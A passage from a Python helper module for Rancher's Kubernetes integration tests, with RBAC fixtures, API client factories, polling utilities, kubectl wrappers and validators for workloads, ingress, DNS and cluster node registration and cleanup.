DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
# this is used when testing users from a auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested group when a third part Auth is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
reason='Group RBAC tests are skipped.'
'Required AUTH env variables '
'have not been set.'
)
# -----------------------------------------------------------------------------
# global variables from test_create_ha.py
test_run_id = "test" + str(random.randint(10000, 99999))
RANCHER_HOSTNAME_PREFIX = os.environ.get("RANCHER_HOSTNAME_PREFIX",
test_run_id)
CERT_MANAGER_VERSION = os.environ.get("RANCHER_CERT_MANAGER_VERSION", "v1.0.1")
# -----------------------------------------------------------------------------
# this is used for testing rbac v2
test_rbac_v2 = os.environ.get("RANCHER_TEST_RBAC_V2", "False")
if_test_rbac_v2 = pytest.mark.skipif(test_rbac_v2 != "True",
reason='test for rbac v2 is skipped')
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def random_str():
return 'random-{0}-{1}'.format(random_num(), int(time.time()))
def random_num():
return random.randint(0, 1000000)
def random_int(start, end):
return random.randint(start, end)
def random_test_name(name="test"):
return name + "-" + str(random_int(10000, 99999))
def get_cluster_client_for_token_v1(cluster_id, token):
url = CATTLE_TEST_URL + "/k8s/clusters/" + cluster_id + "/v1/schemas"
return rancher.Client(url=url, token=token, verify=False)
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
def wait_for(callback, timeout=DEFAULT_TIMEOUT, timeout_message=None):
start = time.time()
ret = callback()
while ret is None or ret is False:
time.sleep(.5)
if time.time() - start > timeout:
if timeout_message:
raise Exception(timeout_message)
else:
raise Exception('Timeout waiting for condition')
ret = callback()
return ret
def random_name():
return "test" + "-" + str(random_int(10000, 99999))
def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
crtb = client.update(
crtb,
roleTemplateId=role_template_id,
userId=user.id)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
prtb = client.update(
prtb,
roleTemplateId=role_template_id,
userId=user.id)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None, job_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
if job_list is None:
job_list = []
workload_list = deployment_list + daemonset_list + cronjob_list + job_list
wls = [dep.name for dep in project_client.list_workload(namespaceId=ns.id).data]
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
if workload_name in job_list:
validate_workload(project_client, workload, "job",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
job_list.remove(workload_name)
# Final assertion to ensure all expected workloads have been validated
assert not deployment_list + daemonset_list + cronjob_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
if type == "job":
job_type = True
expected_status = "Succeeded"
else:
job_type = False
expected_status = "Running"
p = wait_for_pod_to_running(p_client, pod, job_type=job_type)
assert p["status"]["phase"] == expected_status
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
if type == "job":
assert wl_result["status"]["succeeded"] == len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
except subprocess.CalledProcessError as e:
return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT, job_type=False):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
if job_type:
expected_state = "succeeded"
else:
expected_state = "running"
while p.state != expected_state :
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if node.worker and (not node.unschedulable):
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
# Including master in list of nodes as master is also schedulable
if ('k3s' in cluster.version["gitVersion"] or 'rke2' in cluster.version["gitVersion"]) and node.controlPlane:
schedulable_nodes.append(node)
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
time.sleep(10)
curl_args = " "
if (insecure_redirect):
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def wait_for_status_code(url, expected_code=200, timeout=DEFAULT_TIMEOUT):
start = time.time()
r = requests.get(url, verify=False)
while r.status_code != expected_code:
time.sleep(1)
r = requests.get(url, verify=False)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for status code {0}'
', actual code {1}'.format(
expected_code, r.status_code
)
)
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
count = 5 * len(target_name_list)
for i in range(1, count):
if len(target_hit_list) == 0:
break
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
if result is not None:
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN, timeout=MACHINE_TIMEOUT):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state,
timeout=timeout)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
# time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
"""to help run KDM job faster (when there are many clusters),
timeout=300 is set"""
wait_for_wl_to_active(sys_p_client, wl, timeout=300)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id],
"targetPort": TEST_IMAGE_PORT}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-rancher")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected, port=TEST_IMAGE_PORT):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected, port=port)
def validate_dns_entry(pod, host, expected, port=TEST_IMAGE_PORT):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
if HARDENED_CLUSTER:
cmd = 'curl -vs {}:{} 2>&1'.format(host, port)
else:
cmd = 'ping -c 1 -W 1 {0}'.format(host)
cmd_output = kubectl_pod_exec(pod, cmd)
connectivity_validation_pass = False
for expected_value in expected:
if expected_value in str(cmd_output):
connectivity_validation_pass = True
break
assert connectivity_validation_pass is True
if HARDENED_CLUSTER:
assert " 200 OK" in str(cmd_output)
else:
assert " 0% packet loss" in str(cmd_output)
dig_cmd = 'dig {0} +short'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
for expected_value in expected:
assert expected_value in str(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
Validates if dns_record is null in for current object client.
@param client: Object client use to create dns_record
@param dns_record: record object subjected to be deleted
@param timeout: Max time to keep checking whether record is deleted or not
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for node delete")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
def create_custom_host_registration_token(client, cluster):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
cluster_type = get_cluster_type(client, cluster)
print(cluster_type)
if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
